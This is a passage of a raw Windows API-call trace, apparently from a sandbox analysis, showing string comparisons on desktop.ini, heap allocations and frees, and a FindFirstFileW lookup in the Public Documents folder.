lpString2="Lock.", cchCount2=5) returned 3 [0267.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.009] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0267.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0267.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.009] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.009] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0267.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0267.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0267.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0267.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0267.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0267.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0267.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0267.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0267.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0267.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0267.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0267.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0267.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0267.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0267.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0267.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0267.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0267.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0267.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0267.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0267.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0267.010] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.010] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0267.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0267.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0267.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0267.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0267.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0267.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.011] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0267.011] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0267.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0267.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0267.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0267.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0267.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0267.011] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0267.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0267.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0267.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0267.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0267.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0267.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0267.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0267.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0267.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0267.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0267.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0267.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0267.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0267.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0267.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0267.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0267.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0267.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.012] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0267.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0267.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0267.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0267.013] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0267.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0267.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0267.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0267.013] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents/desktop.ini", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28697d55, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28697d55, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x800530, dwReserved1=0x12cb3, cFileName="desktop.ini", cAlternateFileName="")) returned 0xaa5760 [0267.014] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0267.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0267.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0267.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0267.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0267.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0267.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0267.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.015] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0267.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0267.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0267.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0267.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0267.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0267.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0267.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0267.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0267.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0267.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0267.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0267.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0267.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0267.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0267.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0267.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0267.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0267.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0267.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0267.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0267.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0267.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0267.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.016] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0267.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0267.017] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0267.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0267.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9b8 [0267.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0267.017] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0267.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0267.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0267.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0267.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0267.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0267.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0267.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0267.017] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0267.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0267.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0267.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0267.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0267.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0267.018] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0267.018] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0267.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0267.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0267.018] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0267.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa490 [0267.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0267.018] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0267.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0267.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0267.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0267.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0267.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0267.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0267.019] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0267.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0267.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0267.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0267.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0267.019] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0267.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0267.019] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0267.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0267.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0267.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0267.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0267.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0267.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0267.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0267.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0267.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0267.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0267.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0267.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0267.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0267.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0267.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0267.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0267.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0267.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0267.020] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 